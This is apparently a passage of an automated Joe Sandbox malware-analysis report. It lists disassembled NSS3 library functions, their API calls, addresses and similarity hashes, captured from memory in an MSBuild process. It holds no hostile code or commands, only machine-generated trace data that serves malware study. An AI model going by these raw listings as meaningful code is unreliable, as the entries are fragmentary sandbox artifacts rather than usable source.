                                                                                        • CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6C684579
                                                                                          • Part of subcall function 6C6841B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C6841BE
                                                                                          • Part of subcall function 6C6841B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6841E9
                                                                                          • Part of subcall function 6C6841B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C684227
                                                                                          • Part of subcall function 6C6841B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6C68423D
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C68459C
                                                                                        Similarity
                                                                                        • API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
                                                                                        • String ID:
                                                                                        • API String ID: 3193526912-0
                                                                                        APIs
                                                                                        • PORT_ArenaMark_Util.NSS3(?,00000000,00000000,00000000,?,6C68E755,00000000,00000004,?,?), ref: 6C68E5F5
                                                                                          • Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
                                                                                          • Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
                                                                                          • Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?), ref: 6C68E62C
                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000000,?), ref: 6C68E63E
                                                                                          • Part of subcall function 6C6DF9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6C67F379,?,00000000,-00000002), ref: 6C6DF9B7
                                                                                        • PK11_HashBuf.NSS3(?,?,?,?,?,?,?,?), ref: 6C68E65C
                                                                                          • Part of subcall function 6C6ADDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6ADDEC
                                                                                          • Part of subcall function 6C6ADDD0: PK11_DigestBegin.NSS3(00000000), ref: 6C6ADE70
                                                                                          • Part of subcall function 6C6ADDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C6ADE83
                                                                                          • Part of subcall function 6C6ADDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6C6ADE95
                                                                                          • Part of subcall function 6C6ADDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C6ADEAE
                                                                                          • Part of subcall function 6C6ADDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6ADEBB
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000,?), ref: 6C68E68E
                                                                                        Similarity
                                                                                        • API ID: K11_Util$Digest$ArenaItem_Mark_$AllocBeginContextCriticalDestroyEnterErrorFinalFindHashResultSectionTag_UnlockValueZfree
                                                                                        • String ID:
                                                                                        • API String ID: 2865137721-0
                                                                                        APIs
                                                                                        • PORT_ArenaMark_Util.NSS3(00000000,?,6C683FFF,00000000,?,?,?,?,?,6C681A1C,00000000,00000000), ref: 6C68ADA7
                                                                                          • Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
                                                                                          • Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
                                                                                          • Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C683FFF,00000000,?,?,?,?,?,6C681A1C,00000000,00000000), ref: 6C68ADB4
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,6C683FFF,?,?,?,?,6C683FFF,00000000,?,?,?,?,?,6C681A1C,00000000), ref: 6C68ADD5
                                                                                          • Part of subcall function 6C6DFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6D8D2D,?,00000000,?), ref: 6C6DFB85
                                                                                          • Part of subcall function 6C6DFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6DFBB1
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7A94B0,?,?,?,?,?,?,?,?,6C683FFF,00000000,?), ref: 6C68ADEC
                                                                                          • Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095
                                                                                        • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C683FFF), ref: 6C68AE3C
                                                                                        Similarity
                                                                                        • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2372449006-0
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C71461B,-00000004), ref: 6C7104DF
                                                                                        • TlsGetValue.KERNEL32(?,00000000,?,6C71461B,-00000004), ref: 6C710510
                                                                                        • EnterCriticalSection.KERNEL32(ED850FDC), ref: 6C710520
                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C71461B,-00000004), ref: 6C710534
                                                                                        • GetLastError.KERNEL32(?,6C71461B,-00000004), ref: 6C710543
                                                                                        Similarity
                                                                                        • API ID: Error$CriticalEnterLastObjectSectionSingleValueWait
                                                                                        • String ID:
                                                                                        • API String ID: 3052423345-0
                                                                                        APIs
                                                                                          • Part of subcall function 6C6C1E10: TlsGetValue.KERNEL32 ref: 6C6C1E36
                                                                                          • Part of subcall function 6C6C1E10: EnterCriticalSection.KERNEL32(?,?,?,6C69B1EE,2404110F,?,?), ref: 6C6C1E4B
                                                                                          • Part of subcall function 6C6C1E10: PR_Unlock.NSS3 ref: 6C6C1E76
                                                                                        • free.MOZGLUE(?,6C6AD079,00000000,00000001), ref: 6C6ACDA5
                                                                                        • PK11_FreeSymKey.NSS3(?,6C6AD079,00000000,00000001), ref: 6C6ACDB6
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C6AD079,00000000,00000001), ref: 6C6ACDCF
                                                                                        • DeleteCriticalSection.KERNEL32(?,6C6AD079,00000000,00000001), ref: 6C6ACDE2
                                                                                        • free.MOZGLUE(?), ref: 6C6ACDE9
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                        • String ID:
                                                                                        • API String ID: 1720798025-0
                                                                                        APIs
                                                                                          • Part of subcall function 6C715B40: PR_GetIdentitiesLayer.NSS3 ref: 6C715B56
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C712CEC
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C712D02
                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C712D1F
                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C712D42
                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C712D5B
                                                                                        Similarity
                                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                        • String ID:
                                                                                        • API String ID: 1593528140-0
                                                                                        APIs
                                                                                          • Part of subcall function 6C715B40: PR_GetIdentitiesLayer.NSS3 ref: 6C715B56
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C712D9C
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C712DB2
                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C712DCF
                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C712DF2
                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C712E0B
                                                                                        Similarity
                                                                                        • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                        • String ID:
                                                                                        • API String ID: 1593528140-0
                                                                                        APIs
                                                                                        • DeleteCriticalSection.KERNEL32(6C79A6D8), ref: 6C79AE0D
                                                                                        • free.MOZGLUE(?), ref: 6C79AE14
                                                                                        • DeleteCriticalSection.KERNEL32(6C79A6D8), ref: 6C79AE36
                                                                                        • free.MOZGLUE(?), ref: 6C79AE3D
                                                                                        • free.MOZGLUE(00000000,00000000,?,?,6C79A6D8), ref: 6C79AE47
                                                                                        Similarity
                                                                                        • API ID: free$CriticalDeleteSection
                                                                                        • String ID:
                                                                                        • API String ID: 682657753-0
                                                                                        APIs
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C616D36
                                                                                        Strings
                                                                                        • %s at line %d of [%.10s], xrefs: 6C616D2F
                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C616D20
                                                                                        • database corruption, xrefs: 6C616D2A
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                        • API String ID: 632333372-598938438
                                                                                        APIs
                                                                                          • Part of subcall function 6C74CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C74CC7B), ref: 6C74CD7A
                                                                                          • Part of subcall function 6C74CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C74CD8E
                                                                                          • Part of subcall function 6C74CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C74CDA5
                                                                                          • Part of subcall function 6C74CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C74CDB8
                                                                                        • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C74CCB5
                                                                                        • memcpy.VCRUNTIME140(6C7E14F4,6C7E02AC,00000090), ref: 6C74CCD3
                                                                                        • memcpy.VCRUNTIME140(6C7E1588,6C7E02AC,00000090), ref: 6C74CD2B
                                                                                          • Part of subcall function 6C669AC0: socket.WSOCK32(?,00000017,6C6699BE), ref: 6C669AE6
                                                                                          • Part of subcall function 6C669AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6699BE), ref: 6C669AFC
                                                                                          • Part of subcall function 6C670590: closesocket.WSOCK32(6C669A8F,?,?,6C669A8F,00000000), ref: 6C670597
                                                                                        Similarity
                                                                                        • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                        • String ID: Ipv6_to_Ipv4 layer
                                                                                        • API String ID: 1231378898-412307543
                                                                                        APIs
                                                                                        • PR_CallOnce.NSS3(6C7E14E4,6C74CC70), ref: 6C798569
                                                                                        • gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6C7985AD
                                                                                        • GetLastError.KERNEL32(?,00000004,00000002), ref: 6C7985B6
                                                                                        • PR_GetCurrentThread.NSS3(?,00000004,00000002), ref: 6C7985C6
                                                                                          • Part of subcall function 6C670F00: PR_GetPageSize.NSS3(6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F1B
                                                                                          • Part of subcall function 6C670F00: PR_NewLogModule.NSS3(clock,6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F25
                                                                                        Similarity
                                                                                        • API ID: CallCurrentErrorLastModuleOncePageSizeThreadgethostbyaddr
                                                                                        • String ID:
                                                                                        • API String ID: 4254312643-0
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(00000000,?,6C6BC97F,?,?,?), ref: 6C6D04BF
                                                                                        • TlsGetValue.KERNEL32(00000000,?,6C6BC97F,?,?,?), ref: 6C6D04F4
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,6C6BC97F,?,?,?), ref: 6C6D050D
                                                                                        • PR_Unlock.NSS3(?,?,?,?,6C6BC97F,?,?,?), ref: 6C6D0556
                                                                                        Similarity
                                                                                        • API ID: Alloc_CriticalEnterSectionUnlockUtilValue
                                                                                        • String ID:
                                                                                        • API String ID: 349578545-0
                                                                                        APIs
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C686C8D
                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C686CA9
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C686CC0
                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C7A8FE0), ref: 6C686CFE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                        APIs
                                                                                        • SECOID_FindOID_Util.NSS3(?,?,6C6E72EC), ref: 6C6E855A
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C688298,?,?,?,6C67FCE5,?), ref: 6C6E07BF
                                                                                          • Part of subcall function 6C6E07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6E07E6
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E081B
                                                                                          • Part of subcall function 6C6E07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E0825
                                                                                        • PORT_ArenaGrow_Util.NSS3(?,00000000,?,00000001,?,?,6C6E72EC), ref: 6C6E859E
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C6E72EC), ref: 6C6E85B8
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,6C6E72EC), ref: 6C6E8600
                                                                                        Similarity
                                                                                        • API ID: ErrorUtil$ArenaHashLookupTable$Alloc_ConstFindGrow_
                                                                                        APIs
                                                                                        • GetFileInformationByHandle.KERNEL32(?,?), ref: 6C6704F1
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C67053B
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C670558
                                                                                        • GetLastError.KERNEL32 ref: 6C67057A
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorFileHandleInformationLast
                                                                                        APIs
                                                                                        • PORT_ArenaMark_Util.NSS3(?), ref: 6C6F2E08
                                                                                          • Part of subcall function 6C6E14C0: TlsGetValue.KERNEL32 ref: 6C6E14E0
                                                                                          • Part of subcall function 6C6E14C0: EnterCriticalSection.KERNEL32 ref: 6C6E14F5
                                                                                          • Part of subcall function 6C6E14C0: PR_Unlock.NSS3 ref: 6C6E150D
                                                                                        • PORT_NewArena_Util.NSS3(00000400), ref: 6C6F2E1C
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C6F2E3B
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6F2E95
                                                                                          • Part of subcall function 6C6E1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E1228
                                                                                          • Part of subcall function 6C6E1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6E1238
                                                                                          • Part of subcall function 6C6E1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E124B
                                                                                          • Part of subcall function 6C6E1200: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E125D
                                                                                          • Part of subcall function 6C6E1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6E126F
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6E1280
                                                                                          • Part of subcall function 6C6E1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6E128E
                                                                                          • Part of subcall function 6C6E1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6E129A
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6E12A1
                                                                                        Similarity
                                                                                        • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                        APIs
                                                                                        • CERT_NewCertList.NSS3 ref: 6C6AACC2
                                                                                          • Part of subcall function 6C682F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C682F0A
                                                                                          • Part of subcall function 6C682F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C682F1D
                                                                                          • Part of subcall function 6C682AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C680A1B,00000000), ref: 6C682AF0
                                                                                          • Part of subcall function 6C682AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C682B11
                                                                                        • CERT_DestroyCertList.NSS3(00000000), ref: 6C6AAD5E
                                                                                          • Part of subcall function 6C6C57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C68B41E,00000000,00000000,?,00000000,?,6C68B41E,00000000,00000000,00000001,?), ref: 6C6C57E0
                                                                                          • Part of subcall function 6C6C57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C6C5843
                                                                                        • CERT_DestroyCertList.NSS3(?), ref: 6C6AAD36
                                                                                          • Part of subcall function 6C682F50: CERT_DestroyCertificate.NSS3(?), ref: 6C682F65
                                                                                          • Part of subcall function 6C682F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C682F83
                                                                                        • free.MOZGLUE(?), ref: 6C6AAD4F
                                                                                        Similarity
                                                                                        • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6C24FF
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6C250F
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6C253C
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6C2554
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C6DF0AD,6C6DF150,?,6C6DF150,?,?,?), ref: 6C6DECBA
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C6DECD1
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
                                                                                          • Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
                                                                                          • Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
                                                                                          • Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C
                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C6DED02
                                                                                          • Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E116E
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C6DED5A
                                                                                        Similarity
                                                                                        • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EDD4
                                                                                        • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EDFD
                                                                                        • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EE14
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • memcpy.VCRUNTIME140(?,?,6C6F9767,00000000,00000000,6C6F7FFA,?,6C6F9767,?,8B7874C0,0000A48E), ref: 6C70EE33
                                                                                        Memory Dump Source
                                                                                         • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                         • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                         • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                         • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                         • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                         • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                         • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                        APIs
                                                                                        • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C715F17,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72AC94
                                                                                        • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C715F17,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72ACA6
                                                                                        • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72ACC0
                                                                                        • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C71AAD4), ref: 6C72ACDB
                                                                                        Similarity
                                                                                        • API ID: free$DestroyFreeK11_Monitor
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C6EC5AD
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • CERT_DecodeCertPackage.NSS3(?,?,6C6EC610,?), ref: 6C6EC5C2
                                                                                          • Part of subcall function 6C6EC0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6EC0E6
                                                                                        • CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6C6EC5E0
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6EC5EF
                                                                                        Similarity
                                                                                        • API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C6BC154,000000FF,00000000,00000000,00000000,00000000,?,?,6C6BC154,?), ref: 6C6E24FA
                                                                                        • PORT_Alloc_Util.NSS3(00000000,?,6C6BC154,?), ref: 6C6E2509
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C6E2525
                                                                                        • free.MOZGLUE(00000000), ref: 6C6E2532
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
                                                                                        APIs
                                                                                        • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C797B1B,?,?,?,?,?,?,?,?,?,6C79798A), ref: 6C790670
                                                                                          • Part of subcall function 6C749EA0: DeleteCriticalSection.KERNEL32(?), ref: 6C749EAA
                                                                                        • free.MOZGLUE(?,00000000,00000000,?,?,6C797B1B,?,?,?,?,?,?,?,?,?,6C79798A), ref: 6C790696
                                                                                        • free.MOZGLUE(00000004,6C797B1B,?,?,?,?,?,?,?,?,?,6C79798A), ref: 6C7906C7
                                                                                        • free.MOZGLUE(?,00000000,00000000,?,?,6C797B1B,?,?,?,?,?,?,?,?,?,6C79798A), ref: 6C7906E9
                                                                                        Similarity
                                                                                        • API ID: free$CriticalDeleteDestroyLockSection
                                                                                        APIs
                                                                                        • ReleaseMutex.KERNEL32(40C70845,?,6C714710,?,000F4240,00000000), ref: 6C71046B
                                                                                        • GetLastError.KERNEL32(?,6C714710,?,000F4240,00000000), ref: 6C710479
                                                                                          • Part of subcall function 6C72BF80: TlsGetValue.KERNEL32(00000000,?,6C71461B,-00000004), ref: 6C72C244
                                                                                        • PR_Unlock.NSS3(40C70845,?,6C714710,?,000F4240,00000000), ref: 6C710492
                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000,?,6C714710,?,000F4240,00000000), ref: 6C7104A5
                                                                                        Similarity
                                                                                        • API ID: Error$LastMutexReleaseUnlockValue
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: CriticalDeleteSectionfree
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6D4D57
                                                                                        • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C6D4DE6
                                                                                        Similarity
                                                                                        • API ID: ErrorR_snprintf
                                                                                        • String ID: %d.%d
                                                                                        APIs
                                                                                        • SECOID_FindOIDByTag_Util.NSS3('8ol,00000000,00000000,?,?,6C6F3827,?,00000000), ref: 6C6F4D0A
                                                                                          • Part of subcall function 6C6E0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E08B4
                                                                                        • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C6F4D22
                                                                                          • Part of subcall function 6C6DFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C681A3E,00000048,00000054), ref: 6C6DFD56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
